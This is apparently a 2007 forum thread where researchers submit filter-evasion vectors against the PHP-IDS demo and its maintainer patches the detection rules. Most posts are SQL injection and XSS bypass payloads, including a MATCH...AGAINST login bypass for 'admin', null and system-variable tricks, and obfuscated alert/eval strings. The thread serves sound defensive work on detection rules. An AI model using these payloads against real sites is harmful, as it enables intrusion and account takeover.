its really getting harder ...
these work, although you have to know a column name first
(php-ids) aa'or column*0 like'0 (or rlike, regexp ...)
(php-ids) aa'or column*0='0
this also works with some reserved words the rules might not detect yet
(php-ids) aa'or current_date*0 != '1
but yeah, I dont like those kind of vectors that much ;)

greetings,
Reiners

Hi Reiners!

I just fixed them issues ;) Thx!

I sent you the Interview questions via PM...

Greetings,
.mario

@.mario
from your initial post we see

(\\[\w]{3}) //detects the IE hex entities

checked most comments here and the default_filter.xml too, but it seems that this has not been improved, did you?
I'd use following instead (though not sure if 7 is really a limit):

(\\[a-zA-Z0-9]{1,7})  //  used character class 'cause I'd never use \w in a security context ;-) 

style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);"

trips the -mod-binding sig. but when I do this it does not..

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

I thought the above is valid, reason you can bypass filters by say using ba\ckg\round-ima\ge:

@kirke: Hi!

(\\[\w]{3}) //detects the IE hex entities

That rule doesn't exist anymore. Why wouldn't you use \ł in a security context?

@CrYpTiC_MauleR: Hmmm - that one's hard to come by effectively. I'll think about that, thx!

Greetings,
.mario

Hi .mario!
interesting questions :) I'll answer them within the next couple of days.
until then, some modifications:

http://demo.php-ids.org/?test=aa'*%20current_date%20!=%20'1 aa'* current_date != '1
http://demo.php-ids.org/?test=1'*current_date*-0%20=%20'0 1'*current_date*-0 = '0
http://demo.php-ids.org/?test=1'*current_date%20rlike'0 1'*current_date rlike'0

http://demo.php-ids.org/?test=aa'/current_date%20in%20(0)%20--%20-a aa'/current_date in (0) -- -a
http://demo.php-ids.org/?test=aa'%20/%20current_date%20regexp%20'0 aa' / current_date regexp '0
http://demo.php-ids.org/?test=0'%20/%20current_date%20XOR%20'1 0' / current_date XOR '1
http://demo.php-ids.org/?test=aa'%20/%20current_date%20!=%20'1 aa' / current_date != '1

http://demo.php-ids.org/?test=1'%20or%20current_date*-0%20rlike'1 1' or current_date*-0 rlike'1

greetings,
Reiners

Quote

Why wouldn't you use ..

I was talking about \hhhhh in IE, there the hex value can be anything between \0 and \fffffff, at least in javascript IIRC ...

@Reiners:
All fixed - current_whatever just happens to be a keyword too often so now the converter transforms current_\w+ for better detection.

yep. also check for system variables by looking for @@\w+ or something alike.

http://demo.php-ids.org/?test=1'*@@version*-0%20=%20'0 1'*@@version*-0%20=%20'0

user variables or other statics work also:

http://demo.php-ids.org/?test=1'*UTC_TIME%20or%20'1 1'*UTC_TIME or '1

http://demo.php-ids.org/?test=1'*@a%20or%20'1 1'*@a or '1
http://demo.php-ids.org/?test=1'*null%20or%20'1 1'*null or '1
http://demo.php-ids.org/?test=1'*@a%20is%20null%20-%20%27 1'*@a is null - '
http://demo.php-ids.org/?test=1'*null%20is%20null%20-%20%27 1'*null is null - '

@a is an unset user variable, so "1 * @var" returns "null".
the ending - ' just ensures that quotes are closed, because I cant find an undetected comment type atm ;)

greetings,
Reiners

edit:
just noticed that you can use \N as synonym for "null" ... that may trick some rules too. I'll try later ;)



Edited 3 time(s). Last edit at 10/29/2007 11:30AM by Reiners.

fixed!

Wow - the \N issue is ugly. I what combinations can you use this? IS \N and NOT \N too?

Greetings,
.mario

"1/0 is \N" and "1 is not \N" both work.

Hey .mario,

Auth Bypass MATCH...AGAINST Variations http://demo.php-ids.org/?test=%27%20or%20MATCH%20username%20AGAINST%20%28%27%2badmin%20-a%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a :

?test=' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username,password AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin -)' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('a* -) -+ ' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('+a* -anything can go here %#$&*$%^*#%$^&#$' IN BOOLEAN MODE); -- -a

EDIT:
Negative matching:

 ?test=' or NOT MATCH username AGAINST ('+h -a*' IN BOOLEAN MODE); -- -a

Stopwords:

?test=' or MATCH username AGAINST ('following contains follow inasmuch as admin contains a and then some etc etc etc. thanx' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/29/2007 03:50PM by tx.

I tested a few old ones, I couldn't wait ;) But seems like the rules are very good now, they resisted some very tricky ones.

Again a vector I personally dont like, but as stated it is no problem to find out a column name on MySQL (if error reporting is on).
http://demo.php-ids.org/?test=1'/column%20is%20not%20null%20-%20%27 1'/column is not null - '
http://demo.php-ids.org/?test=1'*column%20is%20not%20%5CN%20-%20%27 1'*column is not \N - '
http://demo.php-ids.org/?test=1'%5ecolumn%20is%20not%20null%20-%20%27 1'^column is not null - '

Then again one I like:
http://demo.php-ids.org/?test='is%5CN%20-%20'1 'is\N - '1
http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%20'1 aa' is \N or '1
(both return true, although I'm not quite sure why the first one does ;)

greetings,
Reiners

PS: I'm not forgetting about the interview ;)

@Reiners and tx: fixed!

@CrYpTiC_MauleR: In what browser did you get that one running?

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

Greetings,
.mario

http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%201%20--%20-a aa' is \N or 1 -- -a

greetings,
Reiners

Muwhahahahahaha

Hackvertor makes my life easier ;)

foo = { get test() { return alert(1) } },
foo.test

gets through :D

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

a&#8205lert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

a‌lert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I found those 2 after about 8 pints of beer too :P

hehe beer + hacking == fun

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

http://demo.php-ids.org/?test=aa%27is%5CN%7c!%27 aa'is\N|!'
http://demo.php-ids.org/?test=%27is%5CN-!%27 'is\N-!' (makes no sense to me, but works ;)

unaesthetic:
http://demo.php-ids.org/?test=asd%27%7ccolumn%26%26%271 asd'|column&&'1
http://demo.php-ids.org/?test=asd%27%7ccolumn!=%27 asd'|column!='

greetings,
Reiners

Hi!

Wow - those are indeed a lil' bit esoteric. Nice ones - thx!

Greetings,
.mario

this guy brought up a new vector I didnt knew of:
select ... from data where not ...
works also with "or" and "and", but not with "is", as far as I've tested.

http://demo.php-ids.org/?test=%27or%20not%27 'or not'
http://demo.php-ids.org/?test='or%20not%20false%20%23aa 'or not false #aa
sweet :)



Edited 1 time(s). Last edit at 11/07/2007 03:20PM by Reiners.

Nice - SQL really seems to be as flexible as JS. Anyway any vector slipping through via new keywords is easy to fix, thanks!

Greetings,
.mario

ha ya!

http://www.thespanner.co.uk/2007/11/09/webfu-using-the-hackvertor-hanzo-sword/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hi, no new vectors, but an old one passes by adding spaces:
http://demo.php-ids.org/?test=%27%20is%20%5CN%20-%20!%20%27 ' is \N - ! '
http://demo.php-ids.org/?test=%27%20is%20%5CN%20=%20%27 ' is \N = '

Today I was also checking how an SQLi attacker can fly below the PHP-IDS-radar. I think that the most users will only log high impacts, however, if you know that PHP-IDS is running, you can almost always modify your injection to get an impact of 5 or 6. Well, a user could modify the impact for every SQLi rule hisself, but I think most of them will leave it as default.
I guess it's beyond the scope of PHP-IDS and I couldn't think of a good solution for this either, since I dont think raising the default impact does the job. Just some thoughts.

greetings,
Reiners

Ew - gotta fix them tomorrow fixed :)

Hmmm - normally the impact should be incremented via session - so repeated attacks will result in very high impact.

But I guess not everybody implemented that functionality.

Thanks and Greetings,
.mario



Edited 1 time(s). Last edit at 11/20/2007 03:12AM by .mario.

&#x65val("aler&quot + "t(1)")

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Fixed in PHPIDS 0.4.3 - very nice find - damn unclosed named entities!

btw - it's a kind of a quickfix - so there might be more with this way. For now :)

http://demo.php-ids.org/?test='%20is%20%5CN=%27 :)

right, I totally forgot about the session which is a good solution I think.

greetings,
Reiners

Ah - little bug in one of the SQLI rules - a + where a * should have been used. Thanks for pointing out!